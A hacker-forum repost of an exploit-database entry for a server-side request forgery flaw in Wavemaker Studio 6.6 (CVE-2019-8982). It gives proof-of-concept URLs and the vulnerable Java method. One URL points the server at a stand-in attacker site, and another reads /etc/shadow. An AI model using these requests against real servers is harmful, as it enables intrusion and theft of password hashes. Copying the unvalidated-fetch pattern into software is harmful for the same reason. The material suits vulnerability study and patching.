跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

Wavemaker Studio 6.6 - Server-Side Request Forgery

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-08-01
# Vendor Homepage: http://www.wavemaker.com/
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
# Affected Version: 6.6
# Tested on: Parrot OS
# CVE : 2019-8982
 
# Description
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an 
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.
 
# Proof Of Concept
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow

# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java

# Line 419-430
@ExposeToClient
public String getContent(String inUrl) throws IOException {
	try {
			String str = getRemoteContent(inUrl);
            str = str.replace("<head>", "<head><base href='" + inUrl
                + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
            return str;
        } catch (Exception e) {
            return "";
        }
}

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。